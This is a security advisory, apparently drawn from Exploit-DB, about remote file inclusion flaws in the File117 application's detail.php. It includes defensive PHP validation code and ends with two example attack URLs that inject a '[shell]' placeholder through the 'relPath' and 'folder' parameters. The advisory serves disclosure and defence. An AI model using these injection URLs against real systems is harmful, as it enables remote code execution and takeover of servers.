Vendor: File117
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: File117

Multiple Remote File Include Vulnerabilities in File117

The File117 application fails to properly sanitize user-supplied data, leading to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by injecting malicious code through the user-controlled 'relPath' and 'folder' parameters of the 'detail.php' script. Successful exploitation can compromise the application and the underlying system, allowing the attacker to execute arbitrary code or perform other malicious activities.

Mitigation:

To mitigate these vulnerabilities, implement proper input validation and sanitization of user-supplied data. Additionally, ensure that the application cannot include remote files by restricting access to external resources and following secure coding practices.
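
One way to apply the validation described above, as an added example (not File117's code and not part of the advisory). It assumes 'detail.php' builds an include path from 'relPath' or 'folder'; INCLUDE_BASE and resolve_local_include() are hypothetical names.

```php
<?php
// Added example, not File117 code. Assumption: detail.php passes the
// 'relPath' / 'folder' request parameters into an include/require path.
// Defence in depth: keep "allow_url_include = Off" in php.ini as well.

// Hypothetical directory holding the only files detail.php may include.
const INCLUDE_BASE = __DIR__ . '/includes';

/**
 * Resolve a user-supplied relative path to a file inside $base.
 * Returns the canonical path, or null if the value must be rejected.
 */
function resolve_local_include(string $base, string $userValue): ?string
{
    // Reject empty values and NUL bytes.
    if ($userValue === '' || strpos($userValue, "\0") !== false) {
        return null;
    }
    // Reject URL schemes and stream wrappers (http://, ftp://, php://, data:, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userValue)) {
        return null;
    }
    // Reject protocol-relative and UNC-style prefixes.
    $prefix = substr($userValue, 0, 2);
    if ($prefix === '//' || $prefix === '\\\\') {
        return null;
    }
    // Canonicalise; realpath() fails for paths that do not exist locally.
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $userValue);
    if ($baseReal === false || $target === false || !is_file($target)) {
        return null;
    }
    // The canonical path must stay under the base directory (blocks ../ traversal).
    if (strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;
    }
    // Only PHP files are expected in the include directory.
    return pathinfo($target, PATHINFO_EXTENSION) === 'php' ? $target : null;
}

// Accept only scalar string input; arrays such as relPath[]=x are rejected.
$relPath = (isset($_GET['relPath']) && is_string($_GET['relPath'])) ? $_GET['relPath'] : '';
$path = resolve_local_include(INCLUDE_BASE, $relPath);
if ($path === null) {
    http_response_code(400);
    exit('Invalid path');
}
require $path;
```

The same function can be applied to the 'folder' parameter before it reaches any include or file-system call.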

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23600/info

File117 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/html/php/detail.php?relPath=[shell]?
http://www.example.com/html/php/detail.php?folder=[shell]?